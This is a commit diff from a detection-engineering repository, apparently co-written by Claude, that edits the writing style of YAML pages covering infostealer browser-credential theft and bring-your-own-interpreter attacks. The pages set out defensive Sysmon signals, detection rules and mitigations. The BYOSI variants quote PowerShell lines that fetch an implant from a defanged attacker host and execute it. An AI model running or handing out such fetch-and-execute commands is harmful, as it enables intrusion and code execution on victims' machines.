mirror of
https://github.com/iimp0ster/detection-chokepoints
synced 2026-08-09 12:41:00 +00:00
refactor: clean up writing style across all chokepoint pages
Remove em dashes from prose throughout all 7 remaining chokepoints, replacing with periods, commas, or semicolons for tighter writing. Remove AttackerControls/AttackerCannotControl bulleted lists (redundant with chokepoint stage descriptions). Intel reference names preserved. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
This commit is contained in:
co-authored by
Claude Opus 4.6
parent
8a3b14a987
commit
d54c031940
@@ -15,13 +15,13 @@ Techniques:
|
||||
DetectionPriority: CRITICAL
|
||||
ThreatPrevalence: HIGH
|
||||
DetectionDifficulty: MEDIUM
|
||||
Description: 'Infostealers systematically harvest credentials, cookies, and autofill data from browser credential databases
|
||||
— the single invariant behavior across all stealer families regardless of obfuscation or bypass technique. Hudson Rock tracks
|
||||
Description: 'Infostealers systematically harvest credentials, cookies, and autofill data from browser credential databases.
|
||||
This is the single invariant behavior across all stealer families regardless of obfuscation or bypass technique. Hudson Rock tracks
|
||||
30+ million infected computers; 1.8 billion credentials were stolen in 2025 alone, with enterprise credentials present in
|
||||
14% of infections (up from 6% in early 2024). The Snowflake breach (2024) demonstrated downstream impact: UNC5537 used infostealer-harvested
|
||||
credentials for initial access to 160+ organizations. LummaC2 (51% of dark web credential logs before its May 2025 takedown),
|
||||
Stealc, RedLine, Raccoon, Vidar, AMOS, and Medusa all share the invariant: the stealer process must open browser credential
|
||||
files (Login Data, Cookies, logins.json) and invoke CryptUnprotectData() or NSS3 decryption — a kernel-observable event
|
||||
files (Login Data, Cookies, logins.json) and invoke CryptUnprotectData() or NSS3 decryption. This is a kernel-observable event
|
||||
regardless of family or Chrome App-Bound Encryption bypass technique used.
|
||||
|
||||
'
|
||||
@@ -112,7 +112,7 @@ Variations:
|
||||
VariantId: vidar-2-0
|
||||
Command:
|
||||
Invocation: "# Pure C rewrite (October 2025):\n# Memory injection into chrome.exe for ABE bypass\n# Calls decryption APIs from within trusted Chrome context\n# Bypasses ABE without COM or CDP"
|
||||
Context: 'Complete rewrite. Memory injection into chrome.exe to call decryption from trusted context — most sophisticated ABE bypass documented.'
|
||||
Context: 'Complete rewrite. Memory injection into chrome.exe to call decryption from trusted context. Most sophisticated ABE bypass documented.'
|
||||
Artifacts:
|
||||
- 'Sysmon EID 10: Process access to chrome.exe with PROCESS_ALL_ACCESS'
|
||||
- 'Sysmon EID 8: CreateRemoteThread into chrome.exe from non-browser process'
|
||||
@@ -123,7 +123,7 @@ Variations:
|
||||
SourceURL: https://www.sentinelone.com/blog/atomic-stealer-threat-actor-spawns-second-variant-of-macos-malware-sold-on-telegram/
|
||||
Notes: 'macOS-targeting infostealer marketed on Telegram for ~$1,000/month. Targets Safari Keychain, all Chromium browsers,
|
||||
Firefox, MetaMask, cryptocurrency wallets, and system information. Uses osascript to prompt for administrator password,
|
||||
bypassing macOS protections. Demonstrates that the browser credential database chokepoint applies cross-platform — macOS
|
||||
bypassing macOS protections. Demonstrates that the browser credential database chokepoint applies cross-platform. macOS
|
||||
browsers use platform-native keychain APIs but the file access pattern is identical.
|
||||
|
||||
'
|
||||
@@ -140,7 +140,7 @@ Variations:
|
||||
FirstSeen: 2025-Q2
|
||||
Status: Active
|
||||
SourceURL: https://thehackernews.com/2025/05/eddiestealer-malware-uses-clickfix.html
|
||||
Notes: 'Identified May 2025; notable for Chrome App-Bound Encryption bypass via Chrome DevTools Protocol (CDP) — connects
|
||||
Notes: 'Identified May 2025; notable for Chrome App-Bound Encryption bypass via Chrome DevTools Protocol (CDP). Connects
|
||||
to a running Chrome instance in debug mode to extract cookies without needing to decrypt the database directly. Represents
|
||||
the third major App-Bound bypass approach (alongside COM elevation and memory injection).
|
||||
|
||||
@@ -157,7 +157,7 @@ Variations:
|
||||
FirstSeen: 2024-Q1
|
||||
Status: Active
|
||||
SourceURL: https://www.resecurity.com/blog/article/new-version-of-medusa-stealer-released-in-dark-web
|
||||
Notes: 'Supports credential harvesting from 100+ browsers — the broadest browser coverage of any tracked stealer family.
|
||||
Notes: 'Supports credential harvesting from 100+ browsers, the broadest browser coverage of any tracked stealer family.
|
||||
Targets all Chromium and Gecko-based browsers, Electron apps storing credentials, and password managers. MaaS subscription
|
||||
model on dark web forums. Demonstrates that comprehensive browser coverage is a competitive differentiator in the stealer
|
||||
market.
|
||||
@@ -166,7 +166,7 @@ Variations:
|
||||
VariantId: medusa-stealer
|
||||
Command:
|
||||
Invocation: "# Broadest coverage: 100+ browsers\n# Targets Chromium, Gecko, Electron apps\n# Also targets password manager databases\n# Same DPAPI/NSS3 decryption pattern"
|
||||
Context: '100+ browser support — broadest coverage. Also targets Electron apps and password managers. MaaS subscription model.'
|
||||
Context: '100+ browser support; broadest coverage. Also targets Electron apps and password managers. MaaS subscription model.'
|
||||
Artifacts:
|
||||
- 'Sysmon EID 10: Non-browser process accessing 100+ browser profile paths'
|
||||
- 'Sysmon EID 3: Large HTTP POST exfil (high volume from broad targeting)'
|
||||
@@ -195,7 +195,7 @@ Variations:
|
||||
Status: Active
|
||||
SourceURL: https://www.infostealers.com/article/exclusive-look-inside-a-compromised-north-korean-apt-machine-linked-to-the-biggest-heist-in-history/
|
||||
Notes: 'North Korean threat actors (LAZARUS GROUP / HIDDEN COBRA) incorporated infostealer deployment into their tradecraft
|
||||
for financial operations. Connected to the February 2025 ByBit cryptocurrency exchange heist ($1.5B — the largest cryptocurrency
|
||||
for financial operations. Connected to the February 2025 ByBit cryptocurrency exchange heist ($1.5B, the largest cryptocurrency
|
||||
theft in history). Hudson Rock 2026 trend report highlights the "infostealer-to-APT pipeline" where stealer credentials
|
||||
enable nation-state initial access without traditional spearphishing. Demonstrates infostealers as strategic intelligence-gathering
|
||||
tools, not just commodity theft.
|
||||
@@ -206,7 +206,7 @@ Variations:
|
||||
Invocation: "# NK groups use commodity stealers + custom tools:\n# Deployed via trojanized crypto/DeFi apps\n# Credential theft feeds financial operations\n# ByBit heist ($1.5B, Feb 2025) used stealer credentials"
|
||||
Context: 'LAZARUS GROUP incorporated commodity infostealers for financial operations. Stealer credentials enable initial access to crypto exchanges.'
|
||||
Artifacts:
|
||||
- 'Same as commodity stealer artifacts — Login Data access, DPAPI calls'
|
||||
- 'Same as commodity stealer artifacts. Login Data access, DPAPI calls.'
|
||||
- 'Additional: Crypto wallet file access (wallet.dat, keystore files)'
|
||||
ChokepointMapping: 'Commodity stealer deployed → credentials harvested → NK APT uses for financial target access'
|
||||
- Name: Contagious Interview (OtterCookie / North Korean Fake Job Interview Stealer)
|
||||
@@ -247,29 +247,17 @@ Prerequisites:
|
||||
- Code execution on victim machine (via ClickFix, malvertising, cracked software, game cheats, SEO poisoning, YouTube malware,
|
||||
or social engineering)
|
||||
- Target must use a Chromium-based browser (Chrome, Edge, Brave, Opera, etc.) or Firefox
|
||||
- Browser credential database files must be accessible (not locked by exclusive handle — Chrome Login Data is typically not
|
||||
- Browser credential database files must be accessible (not locked by exclusive handle; Chrome Login Data is typically not
|
||||
exclusively locked)
|
||||
- For App-Bound Encryption bypass variants: Chrome must be installed (COM elevation requires GoogleChromeElevationService);
|
||||
OR Chrome must be running (CDP bypass); OR stealer must have code injection capability (memory injection bypass)
|
||||
- Outbound network access for C2 exfiltration (though some variants stage locally and exfiltrate via separate channel)
|
||||
AttackerControls:
|
||||
- Stealer family (LummaC2, RedLine, Raccoon, Vidar, AMOS)
|
||||
- Delivery method (ClickFix, malvertising, phishing)
|
||||
- App-Bound Encryption bypass technique (COM, CDP, injection)
|
||||
- Obfuscation and packing of the stealer binary
|
||||
- Exfiltration method (HTTP POST, Telegram, Discord)
|
||||
AttackerCannotControl:
|
||||
- Must open browser credential database files (Login Data, Cookies)
|
||||
- Must decrypt credentials via DPAPI, NSS3, COM elevation, CDP, or process injection into a trusted browser context
|
||||
- File access event is logged when credential DB is opened
|
||||
- API call to decryption function is observable via ETW/AMSI
|
||||
- Exfiltration of harvested data requires outbound connection
|
||||
Chokepoints:
|
||||
- Stage: Credential Database Access
|
||||
Input: Stealer process is running on the victim machine
|
||||
Invariant: Must open browser credential database files (Login Data, Cookies, Local State, logins.json) —
|
||||
these are the only locations where browser credentials are stored
|
||||
Observable: 'Sysmon EID 11 (FileCreate — stealer copies credential DB to temp) or Windows Security
|
||||
Invariant: Must open browser credential database files (Login Data, Cookies, Local State, logins.json).
|
||||
These are the only locations where browser credentials are stored.
|
||||
Observable: 'Sysmon EID 11 (FileCreate; stealer copies credential DB to temp) or Windows Security
|
||||
EID 4663 (Object Access audit) showing a non-browser process accessing Chrome/Edge/Firefox credential files'
|
||||
WhyCantBypass: Browser credentials only exist in these database files. The stealer must read them.
|
||||
There is no alternative path to the credentials.
|
||||
@@ -281,7 +269,7 @@ Chokepoints:
|
||||
SigmaRef: sigma-rules/browser-credential-theft/hunt.yml
|
||||
- Stage: Credential Decryption
|
||||
Input: Credential database content has been read
|
||||
Invariant: Must invoke platform decryption APIs — CryptUnprotectData() (DPAPI) for Chromium browsers,
|
||||
Invariant: Must invoke platform decryption APIs. CryptUnprotectData() (DPAPI) for Chromium browsers,
|
||||
NSS3 decryption for Firefox, or an App-Bound Encryption bypass technique
|
||||
Observable: 'CryptUnprotectData calls from non-browser processes. Chrome Elevation Service COM interface
|
||||
activation. Chrome DevTools Protocol connections to running Chrome instances (CDP bypass).'
|
||||
@@ -355,9 +343,9 @@ EvolutionTimeline:
|
||||
Variants: []
|
||||
EventType: event
|
||||
- Date: 2024-Q2
|
||||
Event: Snowflake breach — infostealer credentials enable access to 160+ organizations
|
||||
Event: 'Snowflake breach: infostealer credentials enable access to 160+ organizations'
|
||||
Change: 'UNC5537 uses credentials harvested by VIDAR, RISEPRO, REDLINE, RACCOON, LUMMA, and METASTEALER from contractor
|
||||
machines to access Snowflake cloud environments. No MFA, no network allowlisting — credentials alone were sufficient.
|
||||
machines to access Snowflake cloud environments. No MFA, no network allowlisting. Credentials alone were sufficient.
|
||||
Victims include Ticketmaster (560M records), AT&T (109M call records), Advance Auto Parts, LendingTree, and 155+ others.
|
||||
Demonstrates infostealers as an enterprise security problem, not just consumer credential theft.
|
||||
|
||||
@@ -371,15 +359,15 @@ EvolutionTimeline:
|
||||
Variants: []
|
||||
EventType: event
|
||||
- Date: 2024-Q3
|
||||
Event: Chrome App-Bound Encryption (July 2024) — bypassed within ~45 days
|
||||
Change: 'Google introduces App-Bound Encryption in Chrome 127 (released July 2024) — encrypts cookie/credential database
|
||||
Event: Chrome App-Bound Encryption (July 2024); bypassed within ~45 days
|
||||
Change: 'Google introduces App-Bound Encryption in Chrome 127 (released July 2024), encrypting cookie/credential databases
|
||||
with a key tied to the Chrome application identity, preventing decryption by other processes using standard DPAPI. Multiple
|
||||
stealers immediately begin research. First bypass via COM elevation to GoogleChromeElevationService documented September
|
||||
2024. CDP-based bypass (EDDIESTEALER) and memory injection (Vidar 2.0) follow within months.
|
||||
|
||||
'
|
||||
DetectionImpact: 'App-Bound Encryption forces stealers to generate new observable behaviors: COM elevation calls to GoogleChromeElevationService,
|
||||
Chrome debug mode activation, or injection into chrome.exe — all of which create additional detection opportunities. DPAPI
|
||||
Chrome debug mode activation, or injection into chrome.exe. All of these create additional detection opportunities. DPAPI
|
||||
call still occurs in all bypass variants; the invariant is preserved.
|
||||
|
||||
'
|
||||
@@ -390,10 +378,10 @@ EvolutionTimeline:
|
||||
Event: RedLine and META Stealer disrupted (Operation Magnus); LummaC2 reaches 51% market share
|
||||
Change: 'October 2024: Europol Operation Magnus disrupts RedLine and META Stealer infrastructure; arrests in multiple countries.
|
||||
Raccoon Stealer administrator pleads guilty. Market consolidates around LummaC2 and Stealc. Enterprise credential presence
|
||||
in infostealers reaches 14% of infections (up from 6% in early 2024) — demonstrating shift toward higher-value targeting.
|
||||
in infostealers reaches 14% of infections (up from 6% in early 2024), demonstrating a shift toward higher-value targeting.
|
||||
|
||||
'
|
||||
DetectionImpact: 'Law enforcement disruption has limited sustained impact — new variants emerge within weeks of each takedown.
|
||||
DetectionImpact: 'Law enforcement disruption has limited sustained impact. New variants emerge within weeks of each takedown.
|
||||
File-based and hash-based IOC sharing becomes less effective as market fragments. Behavioral detection of the invariant
|
||||
(file access + DPAPI call) remains the only durable detection approach.
|
||||
|
||||
@@ -402,11 +390,11 @@ EvolutionTimeline:
|
||||
Variants: []
|
||||
EventType: event
|
||||
- Date: 2025-Q1
|
||||
Event: ByBit heist ($1.5B) — North Korean APT uses infostealer-to-APT pipeline
|
||||
Event: 'ByBit heist ($1.5B): North Korean APT uses infostealer-to-APT pipeline'
|
||||
Change: 'February 2025: Lazarus Group / TraderTraitor executes $1.5B ByBit cryptocurrency heist via supply chain compromise
|
||||
of Safe(Wallet) — a developer''s workstation was compromised via social engineering, and malicious code was injected into
|
||||
of Safe(Wallet). A developer''s workstation was compromised via social engineering, and malicious code was injected into
|
||||
the transaction signing UI. Credentials (potentially infostealer-harvested) may have enabled the initial developer compromise.
|
||||
Demonstrates the "infostealer-to-APT pipeline" — commodity stealer infections enabling nation-state operations. Hudson
|
||||
Demonstrates the "infostealer-to-APT pipeline": commodity stealer infections enabling nation-state operations. Hudson
|
||||
Rock (February 2026) identifies this as a primary 2026 trend: sophisticated APTs systematically purchasing or harvesting
|
||||
infostealer logs.
|
||||
|
||||
@@ -422,7 +410,7 @@ EvolutionTimeline:
|
||||
- Date: 2025-Q2
|
||||
Event: LummaC2 disrupted (May 2025); 1.8 billion credentials stolen in 2025
|
||||
Change: 'FBI/Europol joint operation disrupts LummaC2 infrastructure; domains seized, C2 servers taken offline. 1.7 million
|
||||
unique LummaC2 logs were already in circulation. Market immediately begins reconstituting — historical precedent (Raccoon
|
||||
unique LummaC2 logs were already in circulation. Market immediately begins reconstituting. Historical precedent (Raccoon
|
||||
v1 → v2, RedLine → successors) indicates 60-90 day reconstitution timeline.
|
||||
|
||||
'
|
||||
@@ -460,7 +448,7 @@ Detections:
|
||||
LogSources:
|
||||
- Sysmon Event ID 10 (Process Access)
|
||||
- Sysmon Event ID 11 (File Created / File Access)
|
||||
- Windows Security Event ID 4663 (File Access — requires Object Access auditing)
|
||||
- Windows Security Event ID 4663 (File Access; requires Object Access auditing)
|
||||
- EDR file open telemetry (CrowdStrike, SentinelOne, Microsoft Defender for Endpoint)
|
||||
Logic: "File Access (EID 4663 or Sysmon EID 10/11):\n TargetObject / TargetFilename:\n contains: \\Google\\Chrome\\\
|
||||
User Data\\Default\\Login Data\n OR contains: \\Google\\Chrome\\User Data\\Default\\Cookies\n OR contains: \\Google\\\
|
||||
@@ -480,7 +468,7 @@ Detections:
|
||||
LogSources:
|
||||
- Sysmon Event ID 10 (Process Access to browser files)
|
||||
- Windows Security Event ID 4663 (File Access)
|
||||
- Sysmon Event ID 8 (CreateRemoteThread — for injection variants)
|
||||
- Sysmon Event ID 8 (CreateRemoteThread; for injection variants)
|
||||
- 'Windows API monitoring: CryptUnprotectData calls from non-browser processes'
|
||||
- EDR behavioral telemetry
|
||||
Logic: "File Access to browser credential path:\n AccessingProcess: NOT browser / NOT known password manager / NOT backup\
|
||||
@@ -494,8 +482,8 @@ Detections:
|
||||
'
|
||||
SigmaRule: sigma-rules/browser-credential-theft/hunt.yml
|
||||
- Level: Analyst
|
||||
Description: 'Non-browser process accesses browser credential database AND makes outbound network connection — complete
|
||||
infostealer execution chain with C2 exfiltration signal
|
||||
Description: 'Non-browser process accesses browser credential database AND makes outbound network connection. Complete
|
||||
infostealer execution chain with C2 exfiltration signal.
|
||||
|
||||
'
|
||||
LogSources:
|
||||
@@ -545,7 +533,7 @@ Intel:
|
||||
Tier: primary
|
||||
URL: https://cloud.google.com/blog/topics/threat-intelligence/unc5537-snowflake-data-theft-extortion/
|
||||
Description: 'Technical analysis of the Snowflake breach (May-June 2024); documents UNC5537''s use of VIDAR, RISEPRO, REDLINE,
|
||||
RACCOON, LUMMA, and METASTEALER-harvested credentials to access 160+ Snowflake environments. No CVE exploitation — credentials
|
||||
RACCOON, LUMMA, and METASTEALER-harvested credentials to access 160+ Snowflake environments. No CVE exploitation. Credentials
|
||||
alone were sufficient. Defines infostealer credentials as a primary enterprise supply chain risk.
|
||||
|
||||
'
|
||||
@@ -564,14 +552,14 @@ OsintSources:
|
||||
Query: behavior_files:"Login Data" behavior_files:"Local State" positives:0
|
||||
URL: https://www.virustotal.com/gui/search/behavior_files%3A%22Login+Data%22+behavior_files%3A%22Local+State%22+positives%3A0
|
||||
Notes: 'Requires VT Intelligence subscription. Finds samples that access both Login Data and Local State files (combined
|
||||
access is a strong infostealer behavioral indicator) while currently evading AV detection — the most dangerous variants
|
||||
access is a strong infostealer behavioral indicator) while currently evading AV detection. These are the most dangerous variants
|
||||
in active circulation.
|
||||
|
||||
'
|
||||
- Platform: Shodan
|
||||
Query: http.html:"stealer" http.html:"logs" http.html:"panel"
|
||||
URL: https://www.shodan.io/search?query=http.html%3A%22stealer%22+http.html%3A%22logs%22
|
||||
Notes: 'Finds exposed infostealer C2 panels — often left accessible due to poor OpSec by stealer operators. Log panels with
|
||||
Notes: 'Finds exposed infostealer C2 panels, often left accessible due to poor OpSec by stealer operators. Log panels with
|
||||
"logs" and "panel" in the HTML indicate active infrastructure. Useful for tracking active campaign infrastructure and
|
||||
reporting to law enforcement or domain registrars.
|
||||
|
||||
@@ -580,10 +568,10 @@ OsintSources:
|
||||
Query: 'page.title:"Join meeting" NOT domain:zoom.us NOT domain:teams.microsoft.com NOT domain:meet.google.com NOT domain:webex.com NOT domain:gotomeeting.com'
|
||||
URL: https://urlscan.io/search/#page.title%3A%22Join%20meeting%22%20NOT%20domain%3Azoom.us%20NOT%20domain%3Ateams.microsoft.com%20NOT%20domain%3Ameet.google.com%20NOT%20domain%3Awebex.com%20NOT%20domain%3Agotomeeting.com
|
||||
Notes: 'Finds fake meeting join pages impersonating Zoom, Teams, Google Meet, and Webex on non-legitimate
|
||||
domains. Common stealer delivery pretext — fake meeting links drop infostealers. Swap title for other
|
||||
domains. Common stealer delivery pretext. Fake meeting links drop infostealers. Swap title for other
|
||||
pretexts: "Sign in - Slack" (Slack), "Microsoft Teams" (Teams), "Download Zoom" (fake installers).'
|
||||
KnownBypasses:
|
||||
- Bypass: Chrome App-Bound Encryption (July 2024) — encrypts credential database against non-Chrome access
|
||||
- Bypass: Chrome App-Bound Encryption (July 2024); encrypts credential database against non-Chrome access
|
||||
Mitigation: 'Enable Chrome App-Bound Encryption (Chrome 127+, enabled by default on Windows). Monitor GoogleChromeElevationService
|
||||
COM access from non-update processes. Enforce MFA everywhere to limit value of stolen credentials.
|
||||
|
||||
@@ -591,11 +579,11 @@ KnownBypasses:
|
||||
Detection: 'App-Bound bypass generates new observable behaviors regardless of technique: (1) COM elevation: unexpected COM
|
||||
activation of GoogleChromeElevationService from non-updater process; (2) CDP bypass: Chrome launched with --remote-debugging-port
|
||||
flag by non-Chrome process; (3) Memory injection: PROCESS_VM_READ access to chrome.exe from non-trusted process (Sysmon
|
||||
EID 10). All variants still ultimately call CryptUnprotectData() — monitoring that API from non-browser processes remains
|
||||
EID 10). All variants still ultimately call CryptUnprotectData(). Monitoring that API from non-browser processes remains
|
||||
effective even against App-Bound bypasses.
|
||||
|
||||
'
|
||||
- Bypass: Process injection into chrome.exe (Vidar 2.0) — calls DPAPI from within trusted Chrome process context
|
||||
- Bypass: Process injection into chrome.exe (Vidar 2.0); calls DPAPI from within trusted Chrome process context
|
||||
Mitigation: 'Enable Windows Defender Credential Guard. Monitor for unexpected memory operations on chrome.exe (cross-process
|
||||
memory reads/writes). Restrict process injection via Attack Surface Reduction rules or Exploit Protection settings.
|
||||
|
||||
@@ -605,7 +593,7 @@ KnownBypasses:
|
||||
rights. Named pipe creation by injected thread is an additional Vidar 2.0 specific indicator.
|
||||
|
||||
'
|
||||
- Bypass: Copying Login Data to TEMP before access — avoids locking issues, may bypass some EDR path-based rules
|
||||
- Bypass: Copying Login Data to TEMP before access; avoids locking issues, may bypass some EDR path-based rules
|
||||
Mitigation: Monitor file copy operations where source path matches browser credential paths
|
||||
Detection: 'Sysmon EID 11 (FileCreated) where TargetFilename matches TEMP path and Image (creating process) is NOT a browser
|
||||
process. Follow with file access monitoring on the copied file. Process copying browser files to temp directories is a
|
||||
@@ -619,16 +607,16 @@ KnownBypasses:
|
||||
Google LLC, Microsoft Corporation, Brave Software, etc. Unsigned "chrome.exe" is a high-confidence malware indicator.
|
||||
|
||||
'
|
||||
- Bypass: Firefox NSS3 decryption (no DPAPI dependency) — different API path from Chromium
|
||||
- Bypass: Firefox NSS3 decryption (no DPAPI dependency); different API path from Chromium
|
||||
Mitigation: Monitor NSS3.dll / nss3.dll load by non-Firefox processes; monitor access to key4.db
|
||||
Detection: 'Sysmon EID 7 (ImageLoaded): nss3.dll loaded by a process that is NOT firefox.exe, thunderbird.exe, or a known
|
||||
Mozilla product. Access to key4.db or logins.json by non-Firefox process. These are the Firefox equivalent of the Chromium
|
||||
Login Data access signal.
|
||||
|
||||
'
|
||||
- Bypass: MFA session cookie theft (T1539) — bypasses MFA even after password reset
|
||||
- Bypass: MFA session cookie theft (T1539); bypasses MFA even after password reset
|
||||
Mitigation: 'Enforce session lifetime limits (max 1 hour for sensitive applications). Implement device binding for sessions.
|
||||
Use hardware security keys (FIDO2) — session cookies stolen from FIDO2-authenticated sessions cannot be reused without
|
||||
Use hardware security keys (FIDO2). Session cookies stolen from FIDO2-authenticated sessions cannot be reused without
|
||||
the physical key.
|
||||
|
||||
'
|
||||
@@ -669,7 +657,7 @@ RawLogs:
|
||||
- Type: Windows Event Log
|
||||
EventId: 4663
|
||||
Source: Microsoft-Windows-Security-Auditing
|
||||
Description: Audit file access — non-browser process reads the Login Data credential database
|
||||
Description: Audit file access. Non-browser process reads the Login Data credential database.
|
||||
MatchedRules:
|
||||
- Research
|
||||
- Analyst
|
||||
@@ -733,10 +721,10 @@ RawLogs:
|
||||
- Type: Sysmon
|
||||
EventId: 8
|
||||
Source: Microsoft-Windows-Sysmon/Operational
|
||||
Description: CryptUnprotectData API call observed via Sysmon API monitoring — DPAPI decryption of harvested credentials
|
||||
Description: CryptUnprotectData API call observed via Sysmon API monitoring. DPAPI decryption of harvested credentials.
|
||||
MatchedRules:
|
||||
- Hunt
|
||||
Sample: 'EventID: 8 (CreateRemoteThread) — or via API monitoring:
|
||||
Sample: 'EventID: 8 (CreateRemoteThread), or via API monitoring:
|
||||
|
||||
UtcTime: 2024-09-14 03:17:43.108
|
||||
|
||||
@@ -795,7 +783,7 @@ RawLogs:
|
||||
|
||||
# Non-browser process making HTTPS connection within seconds of credential DB access
|
||||
|
||||
# is the Analyst rule''s final signal — high confidence, low FP.
|
||||
# is the Analyst rule''s final signal. High confidence, low FP.
|
||||
|
||||
'
|
||||
EmulationScript:
|
||||
|
||||
@@ -36,29 +36,29 @@ Author: '@iimp0ster'
|
||||
Chokepoints:
|
||||
- Stage: Interpreter Deployment
|
||||
Input: Attacker has code execution on the target
|
||||
Invariant: A non-default scripting interpreter runtime must be introduced to the system — either written to disk as a
|
||||
Invariant: A non-default scripting interpreter runtime must be introduced to the system, either written to disk as a
|
||||
standalone binary or loaded in-memory as embedded DLLs within a .NET host process (IronPython, Boolang)
|
||||
Observable: 'Disk-based: Sysmon EID 11 showing a vendor-signed interpreter binary (python.exe, php.exe, node.exe) written
|
||||
to a user-writable directory. In-memory: Sysmon EID 7 showing interpreter DLLs (IronPython.dll, Microsoft.Scripting.dll)
|
||||
loaded by a .NET host process.'
|
||||
WhyCantBypass: The interpreter runtime is required to parse and execute scripts — it cannot be replaced by a native OS
|
||||
WhyCantBypass: The interpreter runtime is required to parse and execute scripts. It cannot be replaced by a native OS
|
||||
component without losing language compatibility. Whether deployed as a binary or embedded DLLs, the runtime must be present.
|
||||
LogSources:
|
||||
- Sysmon Event ID 11 (File Create)
|
||||
- Sysmon Event ID 1 (Process Creation — archive extraction)
|
||||
- Sysmon Event ID 1 (Process Creation, archive extraction)
|
||||
- Windows Security Event ID 4688 (Process Creation)
|
||||
DetectionTier: Research
|
||||
SigmaRef: sigma-rules/byosi/research.yml
|
||||
- Stage: Interpreter Execution
|
||||
Input: Interpreter runtime is available — either as a binary on disk or as embedded DLLs in a host process
|
||||
Input: Interpreter runtime is available, either as a binary on disk or as embedded DLLs in a host process
|
||||
Invariant: The non-default interpreter binary must be launched as a new process to run attacker scripts.
|
||||
Observable: 'Sysmon EID 1 showing python.exe, node.exe, php.exe, etc. running from a non-standard path
|
||||
(not Program Files). Command line may reveal the script being executed or inline code.'
|
||||
WhyCantBypass: Script files require their matching interpreter process to execute — there is no way to run Python/PHP/Node scripts without spawning the interpreter.
|
||||
WhyCantBypass: Script files require their matching interpreter process to execute. There is no way to run Python/PHP/Node scripts without spawning the interpreter.
|
||||
LogSources:
|
||||
- Sysmon Event ID 1 (Process Creation)
|
||||
- Windows Security Event ID 4688 (Process Creation)
|
||||
- Sysmon Event ID 7 (Image Loaded — interpreter DLLs)
|
||||
- Sysmon Event ID 7 (Image Loaded, interpreter DLLs)
|
||||
DetectionTier: Hunt
|
||||
SigmaRef: sigma-rules/byosi/hunt.yml
|
||||
- Stage: Malicious Script Action
|
||||
@@ -66,7 +66,7 @@ Chokepoints:
|
||||
Invariant: The interpreter must load attacker-controlled script content and perform an observable action (network connection, file write, process spawn, credential access).
|
||||
Observable: 'Sysmon EID 3 showing outbound connections from the interpreter process. EID 1 showing child processes
|
||||
spawned by the interpreter. EID 11/12/13 showing file or registry modifications.'
|
||||
WhyCantBypass: The script must interact with the OS to achieve its objective — C2 callbacks require network, data theft requires file/process access, persistence requires registry/filesystem writes.
|
||||
WhyCantBypass: The script must interact with the OS to achieve its objective. C2 callbacks require network, data theft requires file/process access, persistence requires registry/filesystem writes.
|
||||
LogSources:
|
||||
- Sysmon Event ID 3 (Network Connection)
|
||||
- Sysmon Event ID 1 (Child Process Creation)
|
||||
@@ -90,7 +90,7 @@ Variations:
|
||||
unable to scan PHP file types.
|
||||
VariantId: byosi-php-shell
|
||||
Command:
|
||||
Invocation: "# Four lines of PowerShell — evaded CrowdStrike, Trellix, SentinelOne:\nInvoke-WebRequest -Uri \"hxxps[://]windows.php.net/downloads/releases/php-8.2.0-nts-Win32-vs16-x64.zip\" -OutFile \"$env:TEMP\\php.zip\"\nExpand-Archive \"$env:TEMP\\php.zip\" -DestinationPath \"C:\\Temp\\php\"\nInvoke-WebRequest -Uri \"hxxps[://]attacker[.]com/implant.php\" -OutFile \"C:\\Temp\\php\\shell.php\"\nC:\\Temp\\php\\php.exe C:\\Temp\\php\\shell.php"
|
||||
Invocation: "# Four lines of PowerShell. Evaded CrowdStrike, Trellix, SentinelOne:\nInvoke-WebRequest -Uri \"hxxps[://]windows.php.net/downloads/releases/php-8.2.0-nts-Win32-vs16-x64.zip\" -OutFile \"$env:TEMP\\php.zip\"\nExpand-Archive \"$env:TEMP\\php.zip\" -DestinationPath \"C:\\Temp\\php\"\nInvoke-WebRequest -Uri \"hxxps[://]attacker[.]com/implant.php\" -OutFile \"C:\\Temp\\php\\shell.php\"\nC:\\Temp\\php\\php.exe C:\\Temp\\php\\shell.php"
|
||||
Context: 'Original BYOSI PoC. Downloads official PHP for Windows, extracts to C:\Temp\php, fetches PHP implant, executes. SentinelOne confirmed unable to scan PHP file types.'
|
||||
Artifacts:
|
||||
- 'Sysmon EID 11: php.exe written to C:\Temp\php\'
|
||||
@@ -108,7 +108,7 @@ Variations:
|
||||
VariantId: polydrop-multi-language
|
||||
Command:
|
||||
Invocation: "# Supports 13 languages. Example with Ruby:\nInvoke-WebRequest -Uri \"hxxps[://]github.com/.../rubyinstaller-3.2.2-1-x64.exe\" -OutFile \"$env:TEMP\\ruby.exe\"\nStart-Process \"$env:TEMP\\ruby.exe\" -ArgumentList \"/silent\" -Wait\nInvoke-WebRequest -Uri \"hxxps[://]attacker[.]com/payload.rb\" -OutFile \"$env:TEMP\\payload.rb\"\nruby.exe \"$env:TEMP\\payload.rb\""
|
||||
Context: 'Expanded BYOSI toolkit supporting 13 languages. Each interpreter is legitimately signed — EDR trusts the binary, cannot scan the script.'
|
||||
Context: 'Expanded BYOSI toolkit supporting 13 languages. Each interpreter is legitimately signed. EDR trusts the binary and cannot scan the script.'
|
||||
Artifacts:
|
||||
- 'Sysmon EID 11: Non-default interpreter binary written to TEMP/AppData'
|
||||
- 'Sysmon EID 1: Interpreter running from non-standard path'
|
||||
@@ -125,7 +125,7 @@ Variations:
|
||||
without touching PowerShell.
|
||||
VariantId: ironnetinjector-turla-ironpython
|
||||
Command:
|
||||
Invocation: "# IronPython embedded via .NET:\n# Malicious Python scripts loaded into memory via IronPython runtime\n# No python.exe on disk — uses .NET-hosted IronPython DLLs\n# Injects Turla tools into legitimate processes"
|
||||
Invocation: "# IronPython embedded via .NET:\n# Malicious Python scripts loaded into memory via IronPython runtime\n# No python.exe on disk. Uses .NET-hosted IronPython DLLs\n# Injects Turla tools into legitimate processes"
|
||||
Context: 'Turla APT. Uses IronPython via .NET to avoid dropping python.exe. Loads malicious .py scripts in memory. Documented by Unit 42.'
|
||||
Artifacts:
|
||||
- 'Sysmon EID 7: IronPython DLLs loaded (IronPython.dll, Microsoft.Scripting.dll)'
|
||||
@@ -196,7 +196,7 @@ Variations:
|
||||
VariantId: byoi-dotnet-embedded-interpreters
|
||||
Command:
|
||||
Invocation: "# .NET application embeds Boolang or IronPython runtime:\n# No standalone interpreter binary on disk\n# Scripts loaded from embedded resources or fetched remotely\n# Executes within the .NET host process"
|
||||
Context: 'Interpreter embedded within .NET application — no standalone binary to detect on disk. Scripts execute within the .NET host process memory.'
|
||||
Context: 'Interpreter embedded within .NET application. No standalone binary to detect on disk. Scripts execute within the .NET host process memory.'
|
